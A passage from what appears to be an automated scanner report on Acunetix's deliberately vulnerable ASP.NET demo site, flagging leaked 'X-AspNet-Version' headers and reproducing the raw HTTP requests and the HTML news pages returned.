          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        24. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (414 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Content-Length: 10975
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10975 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 30429
          
          
          Response body (30429 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="…" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="…" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        25. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Content-Length: 3745
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3745 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 17859
          
          
          Response body (17859 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
